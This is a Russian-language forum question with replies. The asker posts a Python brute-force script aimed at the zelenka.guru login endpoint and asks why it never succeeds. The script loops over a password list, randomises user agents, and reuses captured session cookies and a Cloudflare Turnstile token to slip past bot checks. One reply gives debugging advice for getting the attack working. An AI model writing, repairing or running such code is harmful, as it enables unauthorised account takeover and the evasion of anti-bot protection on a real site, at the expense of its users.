Брут аккаунтов Zelenka Guru
мне надо было сделать код для брутфорс-атак на сайт Zelenka Guru
Вот сам код:
import requests
import random
from bs4 import BeautifulSoup
from fake_useragent import UserAgent

while True:
    ua = UserAgent()
    password_list = ["g3gw9a6Kcp82Jyr", "ri3290", "pidor"]
    random_pass = random.choice(password_list)
    
    headers = {
        "content-type": "application/x-www-form-urlencoded",
        "Cookie": "dfuid=98c90934ac90d931a0988f47cc821692; xf_session=ea2bdd646b3184745eb3cf532caed14e; _ga=GA1.1.959450865.1723225938; G_ENABLED_IDPS=google; G_AUTHUSER_H=1; _ga_J7RS527GFK=GS1.1.1723225938.1.1.1723226088.0.0.0",
        "User-Agent": ua.random
    }

    data = {
        "login": "почта",
        "password": random_pass,
        "cf-turnstile-response": "0.ZMSULyqHPgpCI-SWW6mNvQ4weA7Z9r4gyrYKJMaIplMEEU__Dkk2Zbi8n7GBA2xhqB7dpydIcJzav5wBqPAl1jIEs4huI-qlX1RTOqqqDaZrZXll6N52MobE0N2vjsNuCxMInFlK3wLBBOkn3ezcsL-BiEMSj95Hy6PAPOtc1f2HPFKdEnuJv1r4c4mjWMwW-9k-trj_V12oyBRCR8HFuNPX7YJBgJXtbwUoSlUeVJb5ylMV3J4lrQcJ5mDdTsi3bQJxeQ8a8XkmxePDbJwVSojh8SdZ2RhRgOn-6wUbCtaiPIToTi9MEYcotW3c3ruYY5bPkaj-MBYFvdfGkSaUw9N8PKFp-IKw0xmR1LPNqqoPoGfyyqRljZXzsOeUdvQCQtH9Y7AiOQvAvTjUSGnJdCXPLZNM3vpKpoXr3ER4vyaAJfE_2mVSRcVEKozEzuHM.UXfDYN2lCUrfSHlZFlEoIQ.653b6a86f2927e325e49bc0d9f51f5f35ab02f9613fe32e556e0be02916f3110",
        "stopfuckingbrute1337": "1",
        "cookie_check": "1",
        "_xfToken": None,
        "redirect": "."
    }

    response = requests.post("https://zelenka.guru/login/login", headers=headers, data=data)

    brute = BeautifulSoup(response.content, "lxml")
    
    if brute.find(class_="button primary login-and-signup-btn OverlayTrigger"):
        print("продолжаем попытки брута..")
    
    else:
        print("Успешный вход!")
        print("Пароль:", random_pass)
        break

Но проблема в том, что всегда пишет "продолжаем попытки брута..", и так до вечности, даже если к почте попадается правильный пароль. Что делать?

print(response.text) изучите ответ при правильном логине\пароле.

Брут - это имя соратника Цезаря. а то, что вы имеете в виду, называется "брут-форс".
